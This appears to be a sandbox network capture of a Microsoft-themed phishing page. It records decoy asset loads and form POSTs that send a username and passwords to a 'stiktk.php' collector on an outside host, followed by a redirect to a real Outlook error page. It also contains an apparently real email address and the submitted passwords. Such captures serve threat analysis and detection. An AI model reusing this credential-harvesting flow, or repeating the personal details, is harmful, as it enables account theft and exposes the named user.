2024-12-17 18:57:13 UTC	1369	IN	Data Raw: 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 39 22 7d 2e 66 61 2d 70 61 73 74 65 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 63 6c 69 70 62 6f 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 61 22 7d 2e 66 61 2d 6c 69 67 68 74 62 75 6c 62 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 62 22 7d 2e 66 61 2d 65 78 63 68 61 6e 67 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 63 22 7d 2e 66 61 2d 63 6c 6f 75 64 2d 64 6f 77 6e 6c 6f 61 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 64 22 7d 2e 66 61 2d 63 6c 6f 75 64 2d 75 70 6c 6f 61 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 65 22 7d 2e 66 61 2d 75 73 65 72 2d 6d 64 3a 62 65 66 6f 72 65 7b 63 6f 6e Data Ascii: efore{content:"\f0e9"}.fa-paste:before,.fa-clipboard:before{content:"\f0ea"}.fa-lightbulb-o:before{content:"\f0eb"}.fa-exchange:before{content:"\f0ec"}.fa-cloud-download:before{content:"\f0ed"}.fa-cloud-upload:before{content:"\f0ee"}.fa-user-md:before{con

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49746	192.229.133.221	443	3156	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 18:57:13 UTC	568	OUT	GET /w3css/4/w3.css HTTP/1.1 Host: www.w3schools.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://7royps9o5i0ithqegr.topshelfdog.com:8443/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-17 18:57:14 UTC	576	IN	HTTP/1.1 200 OK Age: 121568 Cache-Control: public,max-age=31536000,public Content-Security-Policy: frame-ancestors 'self' https://mycourses.w3schools.com https://pathfinder.w3schools.com; Content-Type: text/css Date: Tue, 17 Dec 2024 18:57:13 GMT Etag: "0c6e59a964fdb1:0+ident" Last-Modified: Mon, 16 Dec 2024 08:43:40 GMT Server: ECS (lhd/35B3) Vary: Accept-Encoding X-Cache: HIT X-Content-Security-Policy: frame-ancestors 'self' https://mycourses.w3schools.com https://pathfinder.w3schools.com; X-Powered-By: ASP.NET Content-Length: 23427 Connection: close
2024-12-17 18:57:14 UTC	16383	IN	Data Raw: ef bb bf 2f 2a 20 57 33 2e 43 53 53 20 34 2e 31 35 20 44 65 63 65 6d 62 65 72 20 32 30 32 30 20 62 79 20 4a 61 6e 20 45 67 69 6c 20 61 6e 64 20 42 6f 72 67 65 20 52 65 66 73 6e 65 73 20 2a 2f 0a 68 74 6d 6c 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2a 2c 2a 3a 62 65 66 6f 72 65 2c 2a 3a 61 66 74 65 72 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 69 6e 68 65 72 69 74 7d 0a 2f 2a 20 45 78 74 72 61 63 74 20 66 72 6f 6d 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 62 79 20 4e 69 63 6f 6c 61 73 20 47 61 6c 6c 61 67 68 65 72 20 61 6e 64 20 4a 6f 6e 61 74 68 61 6e 20 4e 65 61 6c 20 67 69 74 2e 69 6f 2f 6e 6f 72 6d 61 6c 69 7a 65 20 2a 2f 0a 68 74 6d 6c 7b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 77 65 62 Data Ascii: /* W3.CSS 4.15 December 2020 by Jan Egil and Borge Refsnes /html{box-sizing:border-box},:before,:after{box-sizing:inherit}/* Extract from normalize.css by Nicolas Gallagher and Jonathan Neal git.io/normalize */html{-ms-text-size-adjust:100%;-web
2024-12-17 18:57:14 UTC	7044	IN	Data Raw: 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 62 63 64 34 21 69 6d 70 6f 72 74 61 6e 74 7d 0a 2e 77 33 2d 62 6c 75 65 2d 67 72 65 79 2c 2e 77 33 2d 68 6f 76 65 72 2d 62 6c 75 65 2d 67 72 65 79 3a 68 6f 76 65 72 2c 2e 77 33 2d 62 6c 75 65 2d 67 72 61 79 2c 2e 77 33 2d 68 6f 76 65 72 2d 62 6c 75 65 2d 67 72 61 79 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 36 30 37 64 38 62 21 69 6d 70 6f 72 74 61 6e 74 7d 0a 2e 77 33 2d 67 72 65 65 6e 2c 2e 77 33 2d 68 6f 76 65 72 2d 67 72 65 65 6e 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 Data Ascii: !important;background-color:#00bcd4!important}.w3-blue-grey,.w3-hover-blue-grey:hover,.w3-blue-gray,.w3-hover-blue-gray:hover{color:#fff!important;background-color:#607d8b!important}.w3-green,.w3-hover-green:hover{color:#fff!important;background-color:#

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49748	108.178.43.142	443	3156	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 18:57:13 UTC	623	OUT	GET /smarty/xls_v1.6/tail-spin.svg HTTP/1.1 Host: kasumbo.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://7royps9o5i0ithqegr.topshelfdog.com:8443/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-17 18:57:14 UTC	565	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Tue, 17 Dec 2024 18:57:13 GMT strict-transport-security: max-age=31536000; includeSubDomains; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff vary: User-Agent,Accept-Encoding alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-12-17 18:57:14 UTC	796	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49747	152.199.21.175	443	3156	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 18:57:13 UTC	679	OUT	GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1 Host: aadcdn.msftauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://7royps9o5i0ithqegr.topshelfdog.com:8443/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-17 18:57:14 UTC	738	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Age: 23202957 Cache-Control: public, max-age=31536000 Content-MD5: nzaLxFgP7ZB3dfMcaybWzw== Content-Type: image/svg+xml Date: Tue, 17 Dec 2024 18:57:14 GMT Etag: 0x8DB5C3F495F4B8C Last-Modified: Wed, 24 May 2023 10:11:48 GMT Server: ECAcc (lhc/7892) Vary: Accept-Encoding X-Cache: HIT x-ms-blob-type: BlockBlob x-ms-lease-status: unlocked x-ms-request-id: 002cd9d5-201e-00e1-69ad-7d6453000000 x-ms-version: 2009-09-19 Content-Length: 3651 Connection: close
2024-12-17 18:57:14 UTC	3651	IN	Data Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e 32 36 38 2c 30 Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49751	152.199.21.175	443	3156	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 18:57:16 UTC	420	OUT	GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1 Host: aadcdn.msftauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-17 18:57:16 UTC	738	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Age: 23202959 Cache-Control: public, max-age=31536000 Content-MD5: nzaLxFgP7ZB3dfMcaybWzw== Content-Type: image/svg+xml Date: Tue, 17 Dec 2024 18:57:16 GMT Etag: 0x8DB5C3F495F4B8C Last-Modified: Wed, 24 May 2023 10:11:48 GMT Server: ECAcc (lhc/7892) Vary: Accept-Encoding X-Cache: HIT x-ms-blob-type: BlockBlob x-ms-lease-status: unlocked x-ms-request-id: 002cd9d5-201e-00e1-69ad-7d6453000000 x-ms-version: 2009-09-19 Content-Length: 3651 Connection: close
2024-12-17 18:57:16 UTC	3651	IN	Data Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e 32 36 38 2c 30 Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49763	104.21.81.229	443	3156	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 18:57:25 UTC	692	OUT	POST /app/stiktk.php HTTP/1.1 Host: ajx6f16w140.chiliesdigital.co.za Connection: keep-alive Content-Length: 57 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept: / Origin: https://7royps9o5i0ithqegr.topshelfdog.com:8443 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://7royps9o5i0ithqegr.topshelfdog.com:8443/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-17 18:57:25 UTC	57	OUT	Data Raw: 75 73 72 6e 3d 61 73 68 74 61 72 2e 6a 75 6e 61 69 64 25 34 30 6d 69 74 65 6c 2e 63 6f 6d 26 70 73 72 64 3d 25 35 42 52 69 5a 75 7a 6c 63 25 32 43 6d 38 6c 47 25 34 30 50 Data Ascii: usrn=ashtar.junaid%40mitel.com&psrd=%5BRiZuzlc%2Cm8lG%40P
2024-12-17 18:57:27 UTC	1110	IN	HTTP/1.1 302 Found Date: Tue, 17 Dec 2024 18:57:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.4.16 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, OPTIONS Access-Control-Allow-Headers: Content-Type Location: https://outlook.office365.com/Encryption/ErrorPage.aspx?src=0&code=10&be=DM8PR09MB6088&fe=BL1PR13CA0351.NAMPRD13.PROD.OUTLOOK.COM cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eA8vuaTHEhpagV%2BRLwCMWx%2BxorJROFmAfE9g7rOC3ziVeNKf3SsZMcG8jCe31%2BH%2FSEQoIdlArTA3JKaIkXGshF43od4SYVYmtK8WWACD6hiSo3qjuHOVsEKvphL7jQaeU3QrByIA2gpe65IqPv%2B6JEJUyQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3923859daa41df-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1722&min_rtt=1695&rtt_var=690&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1349&delivery_rate=1526398&cwnd=252&unsent_bytes=0&cid=bf557ea63d83dcf7&ts=1986&x=0"
2024-12-17 18:57:27 UTC	9	IN	Data Raw: 34 0d 0a 20 20 0d 0a 0d 0a Data Ascii: 4
2024-12-17 18:57:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49764	104.21.81.229	443	3156	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 18:57:25 UTC	692	OUT	POST /app/stiktk.php HTTP/1.1 Host: ajx6f16w140.chiliesdigital.co.za Connection: keep-alive Content-Length: 36 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept: / Origin: https://7royps9o5i0ithqegr.topshelfdog.com:8443 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://7royps9o5i0ithqegr.topshelfdog.com:8443/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-17 18:57:25 UTC	36	OUT	Data Raw: 75 73 72 6e 3d 61 73 68 74 61 72 2e 6a 75 6e 61 69 64 25 34 30 6d 69 74 65 6c 2e 63 6f 6d 26 70 73 72 64 3d Data Ascii: usrn=ashtar.junaid%40mitel.com&psrd=
2024-12-17 18:57:26 UTC	957	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 18:57:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.4.16 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, OPTIONS Access-Control-Allow-Headers: Content-Type cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mw1Ad6s4mkz1brgtE9OKSakOYmPqwPkiMXxvqp08nvK5d8NNED2vdVqCdiHWe0639keDbGj3kKERQXXm2P8SZFH0Jg4rTFCEipIUgLNeJBxo9YZrV5xda1pZ9TbnmRhphSXmZyWNrNumbz6%2BKyDzrXsQHw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f392385988cc468-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1475&min_rtt=1464&rtt_var=572&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=1328&delivery_rate=1875401&cwnd=235&unsent_bytes=0&cid=978a771f5ef483b9&ts=979&x=0"
2024-12-17 18:57:26 UTC	66	IN	Data Raw: 33 63 0d 0a 20 20 0d 0a 4f 6e 65 20 6f 72 20 62 6f 74 68 20 6f 66 20 74 68 65 20 76 61 6c 75 65 73 20 27 75 73 72 6e 27 20 61 6e 64 20 27 70 73 72 64 27 20 61 72 65 20 6d 69 73 73 69 6e 67 2e 0d 0a Data Ascii: 3c One or both of the values 'usrn' and 'psrd' are missing.
2024-12-17 18:57:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49769	104.21.81.229	443	3156	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 18:57:28 UTC	370	OUT	GET /app/stiktk.php HTTP/1.1 Host: ajx6f16w140.chiliesdigital.co.za Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-17 18:57:29 UTC	967	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 18:57:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.4.16 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, OPTIONS Access-Control-Allow-Headers: Content-Type cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HeodxgF6aFrGBGgOMCt%2BD9VV1EqHafXk62%2BidJwemc%2BmkkSSfWRVohnBELzFNJhltB4xHtMiEaPtREYLM1gkfjJ%2B5QSk4scR5jcs1m4y8jiJPjtl%2BaZO04SrqkcyiH1hhKWdRKCaIxiwNVf%2FXjGxDlCcKQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f39239c19a8c3ee-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1485&min_rtt=1476&rtt_var=573&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=948&delivery_rate=1877813&cwnd=247&unsent_bytes=0&cid=cef10d22db6e64f4&ts=1009&x=0"
2024-12-17 18:57:29 UTC	66	IN	Data Raw: 33 63 0d 0a 20 20 0d 0a 4f 6e 65 20 6f 72 20 62 6f 74 68 20 6f 66 20 74 68 65 20 76 61 6c 75 65 73 20 27 75 73 72 6e 27 20 61 6e 64 20 27 70 73 72 64 27 20 61 72 65 20 6d 69 73 73 69 6e 67 2e 0d 0a Data Ascii: 3c One or both of the values 'usrn' and 'psrd' are missing.
2024-12-17 18:57:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49768	52.98.95.210	443	3156	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 18:57:29 UTC	702	OUT	GET /Encryption/ErrorPage.aspx?src=0&code=10&be=DM8PR09MB6088&fe=BL1PR13CA0351.NAMPRD13.PROD.OUTLOOK.COM HTTP/1.1 Host: outlook.office365.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept: / Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://7royps9o5i0ithqegr.topshelfdog.com:8443/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-17 18:57:29 UTC	725	IN	HTTP/1.1 404 Vary: Origin Server: Microsoft-IIS/10.0 request-id: c40b36a5-ed2a-a7f4-4cb8-f8a3238ec9c9 X-CalculatedBETarget: DX1P273MB1201.AREP273.PROD.OUTLOOK.COM X-BackEndHttpStatus: 404 Set-Cookie: X-E4E-CorrelationId=ea6498ed-7faf-4947-8b58-763d6c9ab338; path=/; secure; samesite=none; httponly Access-Control-Allow-Origin: null Access-Control-Allow-Credentials: true X-Proxy-RoutingCorrectness: 1 Alt-Svc: h3=":443";ma=2592000,h3-29=":443";ma=2592000 X-Proxy-BackendServerStatus: 404 X-FirstHopCafeEFZ: DXB X-FEProxyInfo: DXXP273CA0009.AREP273.PROD.OUTLOOK.COM X-FEEFZInfo: DXB X-Powered-By: ASP.NET X-FEServer: DXXP273CA0009 Date: Tue, 17 Dec 2024 18:57:31 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49772	104.21.81.229	443	3156	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 18:57:33 UTC	692	OUT	POST /app/stiktk.php HTTP/1.1 Host: ajx6f16w140.chiliesdigital.co.za Connection: keep-alive Content-Length: 54 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept: / Origin: https://7royps9o5i0ithqegr.topshelfdog.com:8443 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://7royps9o5i0ithqegr.topshelfdog.com:8443/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-17 18:57:33 UTC	54	OUT	Data Raw: 75 73 72 6e 3d 61 73 68 74 61 72 2e 6a 75 6e 61 69 64 25 34 30 6d 69 74 65 6c 2e 63 6f 6d 26 70 73 72 64 3d 55 37 62 25 32 35 4e 4f 30 68 7a 50 4a 25 33 46 53 29 Data Ascii: usrn=ashtar.junaid%40mitel.com&psrd=U7b%25NO0hzPJ%3FS)
2024-12-17 18:57:35 UTC	1112	IN	HTTP/1.1 302 Found Date: Tue, 17 Dec 2024 18:57:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.4.16 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, OPTIONS Access-Control-Allow-Headers: Content-Type Location: https://outlook.office365.com/Encryption/ErrorPage.aspx?src=0&code=10&be=DM8PR09MB6088&fe=BL1PR13CA0351.NAMPRD13.PROD.OUTLOOK.COM cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3jFuCUHlwe7OdxH%2Fa%2B4xdFZHxS6vIkWa0LdoEGoNjLng1L9%2FHeqxdKMxIWcJ9%2FmZ1ngY4Oha8ycfM%2BVWCDNnaZtsZbxyNxLvzQYH3yV8fK0X%2B0gn0iT1HbXtHwgovYPcXPoSdv5LtDq5HQzkojT1qMaKHQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3923b7da5cde97-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1484&min_rtt=1466&rtt_var=586&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=1346&delivery_rate=1811414&cwnd=228&unsent_bytes=0&cid=bc6928d870701f4d&ts=1973&x=0"
2024-12-17 18:57:35 UTC	9	IN	Data Raw: 34 0d 0a 20 20 0d 0a 0d 0a Data Ascii: 4
2024-12-17 18:57:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49773	104.21.81.229	443	3156	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
